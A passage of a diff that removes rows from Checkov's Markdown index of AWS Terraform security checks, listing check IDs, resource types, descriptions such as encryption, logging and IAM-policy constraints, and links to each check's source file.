[AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 184 | CKV_AWS_103 | resource | aws_lb_listener | Ensure that load balancer is using at least TLS 1.2 | 
Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 185 | CKV_AWS_104 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB has audit logs enabled | Terraform | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py) | -| 186 | CKV_AWS_105 | resource | aws_redshift_parameter_group | Ensure Redshift uses SSL | Terraform | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py) | -| 187 | CKV_AWS_106 | resource | aws_ebs_encryption_by_default | Ensure EBS default encryption is enabled | Terraform | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py) | -| 188 | CKV_AWS_107 | data | aws_iam_policy_document | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py) | -| 189 | CKV_AWS_108 | data | aws_iam_policy_document | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py) | -| 190 | CKV_AWS_109 | data | aws_iam_policy_document | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py) | -| 191 | CKV_AWS_110 | data | aws_iam_policy_document | Ensure IAM policies does not allow privilege escalation | Terraform | 
[IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py) | -| 192 | CKV_AWS_111 | data | aws_iam_policy_document | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py) | -| 193 | CKV_AWS_112 | resource | aws_ssm_document | Ensure Session Manager data is encrypted in transit | Terraform | [SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py) | -| 194 | CKV_AWS_113 | resource | aws_ssm_document | Ensure Session Manager logs are enabled and encrypted | Terraform | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py) | -| 195 | CKV_AWS_114 | resource | aws_emr_cluster | Ensure that EMR clusters with Kerberos have Kerberos Realm set | Terraform | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py) | -| 196 | CKV_AWS_115 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Terraform | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | -| 197 | CKV_AWS_116 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Terraform | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py) | -| 198 | CKV_AWS_117 | resource | aws_lambda_function | Ensure that AWS Lambda function is 
configured inside a VPC | Terraform | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py) | -| 199 | CKV_AWS_118 | resource | aws_db_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | -| 200 | CKV_AWS_118 | resource | aws_rds_cluster_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | -| 201 | CKV_AWS_119 | resource | aws_dynamodb_table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Terraform | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py) | -| 202 | CKV_AWS_120 | resource | aws_api_gateway_stage | Ensure API Gateway caching is enabled | Terraform | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py) | -| 203 | CKV_AWS_121 | resource | aws_config_configuration_aggregator | Ensure AWS Config is enabled in all regions | Terraform | [ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py) | -| 204 | CKV_AWS_122 | resource | aws_sagemaker_notebook_instance | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance | Terraform | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py) | -| 205 | CKV_AWS_123 | resource | aws_vpc_endpoint_service | Ensure that VPC 
Endpoint Service is configured for Manual Acceptance | Terraform | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) | -| 206 | CKV_AWS_124 | resource | aws_cloudformation_stack | Ensure that CloudFormation stacks are sending event notifications to an SNS topic | Terraform | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py) | -| 207 | CKV_AWS_126 | resource | aws_instance | Ensure that detailed monitoring is enabled for EC2 instances | Terraform | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py) | -| 208 | CKV_AWS_127 | resource | aws_elb | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager | Terraform | [ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py) | -| 209 | CKV_AWS_129 | resource | aws_db_instance | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled | Terraform | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py) | -| 210 | CKV_AWS_130 | resource | aws_subnet | Ensure VPC subnets do not assign public IP by default | Terraform | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py) | -| 211 | CKV_AWS_131 | resource | aws_alb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | -| 212 | CKV_AWS_131 | resource | aws_lb | Ensure that ALB drops HTTP headers | Terraform | 
[ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | -| 213 | CKV_AWS_133 | resource | aws_db_instance | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | -| 214 | CKV_AWS_133 | resource | aws_rds_cluster | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | -| 215 | CKV_AWS_134 | resource | aws_elasticache_cluster | Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on | Terraform | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py) | -| 216 | CKV_AWS_135 | resource | aws_instance | Ensure that EC2 is EBS optimized | Terraform | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py) | -| 217 | CKV_AWS_136 | resource | aws_ecr_repository | Ensure that ECR repositories are encrypted using KMS | Terraform | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py) | -| 218 | CKV_AWS_137 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | -| 219 | CKV_AWS_137 | resource | aws_opensearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | 
[ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | -| 220 | CKV_AWS_138 | resource | aws_elb | Ensure that ELB is cross-zone-load-balancing enabled | Terraform | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py) | -| 221 | CKV_AWS_139 | resource | aws_rds_cluster | Ensure that RDS clusters have deletion protection enabled | Terraform | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py) | -| 222 | CKV_AWS_140 | resource | aws_rds_global_cluster | Ensure that RDS global clusters are encrypted | Terraform | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py) | -| 223 | CKV_AWS_141 | resource | aws_redshift_cluster | Ensured that Redshift cluster allowing version upgrade by default | Terraform | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py) | -| 224 | CKV_AWS_142 | resource | aws_redshift_cluster | Ensure that Redshift cluster is encrypted by KMS | Terraform | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py) | -| 225 | CKV_AWS_143 | resource | aws_s3_bucket | Ensure that S3 bucket has lock configuration enabled by default | Terraform | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py) | -| 226 | CKV_AWS_144 | resource | aws_s3_bucket | Ensure that S3 bucket has cross-region replication enabled | Terraform | 
[S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | -| 227 | CKV_AWS_144 | resource | aws_s3_bucket_replication_configuration | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | -| 228 | CKV_AWS_145 | resource | aws_s3_bucket | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | -| 229 | CKV_AWS_145 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | -| 230 | CKV_AWS_146 | resource | aws_db_cluster_snapshot | Ensure that RDS database cluster snapshot is encrypted | Terraform | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py) | -| 231 | CKV_AWS_147 | resource | aws_codebuild_project | Ensure that CodeBuild projects are encrypted using CMK | Terraform | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py) | -| 232 | CKV_AWS_148 | resource | aws_default_vpc | Ensure no default VPC is planned to be provisioned | Terraform | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py) | -| 233 | CKV_AWS_149 | resource | aws_secretsmanager_secret | Ensure that Secrets Manager secret is encrypted using KMS 
CMK | Terraform | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py) |
-| 234 | CKV_AWS_150 | resource | aws_alb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) |
-| 235 | CKV_AWS_150 | resource | aws_lb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) |
-| 236 | CKV_AWS_152 | resource | aws_alb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) |
-| 237 | CKV_AWS_152 | resource | aws_lb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) |
-| 238 | CKV_AWS_153 | resource | aws_autoscaling_group | Autoscaling groups should supply tags to launch configurations | Terraform | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py) |
-| 239 | CKV_AWS_154 | resource | aws_redshift_cluster | Ensure Redshift is not deployed outside of a VPC | Terraform | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py) |
-| 240 | CKV_AWS_155 | resource | aws_workspaces_workspace | Ensure that Workspace user volumes are encrypted | Terraform | 
[WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) |
-| 241 | CKV_AWS_156 | resource | aws_workspaces_workspace | Ensure that Workspace root volumes are encrypted | Terraform | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) |
-| 242 | CKV_AWS_157 | resource | aws_db_instance | Ensure that RDS instances have Multi-AZ enabled | Terraform | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py) |
-| 243 | CKV_AWS_158 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group is encrypted by KMS | Terraform | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py) |
-| 244 | CKV_AWS_159 | resource | aws_athena_workgroup | Ensure that Athena Workgroup is encrypted | Terraform | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py) |
-| 245 | CKV_AWS_160 | resource | aws_timestreamwrite_database | Ensure that Timestream database is encrypted with KMS CMK | Terraform | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py) |
-| 246 | CKV_AWS_161 | resource | aws_db_instance | Ensure RDS database has IAM authentication enabled | Terraform | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py) |
-| 247 | CKV_AWS_162 | resource | aws_rds_cluster | Ensure RDS cluster has IAM authentication enabled | Terraform | 
[RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py) |
-| 248 | CKV_AWS_163 | resource | aws_ecr_repository | Ensure ECR image scanning on push is enabled | Terraform | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py) |
-| 249 | CKV_AWS_164 | resource | aws_transfer_server | Ensure Transfer Server is not exposed publicly. | Terraform | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py) |
-| 250 | CKV_AWS_165 | resource | aws_dynamodb_global_table | Ensure DynamoDB point in time recovery (backup) is enabled for global tables | Terraform | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py) |
-| 251 | CKV_AWS_166 | resource | aws_backup_vault | Ensure Backup Vault is encrypted at rest using KMS CMK | Terraform | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py) |
-| 252 | CKV_AWS_167 | resource | aws_glacier_vault | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it | Terraform | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py) |
-| 253 | CKV_AWS_168 | resource | aws_sqs_queue | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) |
-| 254 | CKV_AWS_168 | resource | aws_sqs_queue_policy | Ensure SQS queue policy is not public by only allowing 
specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) |
-| 255 | CKV_AWS_169 | resource | aws_sns_topic_policy | Ensure SNS topic policy is not public by only allowing specific services or principals to access it | Terraform | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py) |
-| 256 | CKV_AWS_170 | resource | aws_qldb_ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Terraform | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py) |
-| 257 | CKV_AWS_171 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encryption is using SSE-KMS | Terraform | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py) |
-| 258 | CKV_AWS_172 | resource | aws_qldb_ledger | Ensure QLDB ledger has deletion protection enabled | Terraform | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py) |
-| 259 | CKV_AWS_173 | resource | aws_lambda_function | Check encryption settings for Lambda environmental variable | Terraform | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) |
-| 260 | CKV_AWS_174 | resource | aws_cloudfront_distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Terraform | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py) |
-| 261 | CKV_AWS_175 | resource | 
aws_waf_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) |
-| 262 | CKV_AWS_175 | resource | aws_wafregional_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) |
-| 263 | CKV_AWS_175 | resource | aws_wafv2_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) |
-| 264 | CKV_AWS_176 | resource | aws_waf_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) |
-| 265 | CKV_AWS_176 | resource | aws_wafregional_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) |
-| 266 | CKV_AWS_177 | resource | aws_kinesis_video_stream | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py) |
-| 267 | CKV_AWS_178 | resource | aws_fsx_ontap_file_system | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py) |
-| 268 | CKV_AWS_179 | resource | aws_fsx_windows_file_system | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py) |
-| 269 | CKV_AWS_180 | resource | aws_imagebuilder_component | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py) |
-| 270 | CKV_AWS_181 | resource | aws_s3_object_copy | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py) |
-| 271 | CKV_AWS_182 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py) |
-| 272 | CKV_AWS_183 | resource | aws_ebs_snapshot_copy | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py) |
-| 273 | CKV_AWS_184 | resource | aws_efs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py) |
-| 274 | CKV_AWS_185 | resource | aws_kinesis_stream | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py) 
|
-| 275 | CKV_AWS_186 | resource | aws_s3_bucket_object | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py) |
-| 276 | CKV_AWS_187 | resource | aws_sagemaker_domain | Ensure Sagemaker domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) |
-| 277 | CKV_AWS_189 | resource | aws_ebs_volume | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py) |
-| 278 | CKV_AWS_190 | resource | aws_fsx_lustre_file_system | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK) | Terraform | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py) |
-| 279 | CKV_AWS_191 | resource | aws_elasticache_replication_group | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py) |
-| 280 | CKV_AWS_192 | resource | aws_wafv2_web_acl | Ensure WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py) |
-| 281 | CKV_AWS_193 | resource | aws_appsync_graphql_api | Ensure AppSync has Logging enabled | Terraform | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py) |
-| 282 | CKV_AWS_194 | resource | aws_appsync_graphql_api | Ensure AppSync has Field-Level logs enabled | Terraform | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py) |
-| 283 | CKV_AWS_195 | resource | aws_glue_crawler | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) |
-| 284 | CKV_AWS_195 | resource | aws_glue_dev_endpoint | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) |
-| 285 | CKV_AWS_195 | resource | aws_glue_job | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) |
-| 286 | CKV_AWS_196 | resource | aws_elasticache_security_group | Ensure no aws_elasticache_security_group resources exist | Terraform | [ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py) |
-| 287 | CKV_AWS_197 | resource | aws_mq_broker | Ensure MQ Broker Audit logging is enabled | Terraform | 
[MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py) |
-| 288 | CKV_AWS_198 | resource | aws_db_security_group | Ensure no aws_db_security_group resources exist | Terraform | [RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py) |
-| 289 | CKV_AWS_199 | resource | aws_imagebuilder_distribution_configuration | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK) | Terraform | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py) |
-| 290 | CKV_AWS_200 | resource | aws_imagebuilder_image_recipe | Ensure that Image Recipe EBS Disk are encrypted with CMK | Terraform | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py) |
-| 291 | CKV_AWS_201 | resource | aws_memorydb_cluster | Ensure MemoryDB is encrypted at rest using KMS CMKs | Terraform | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py) |
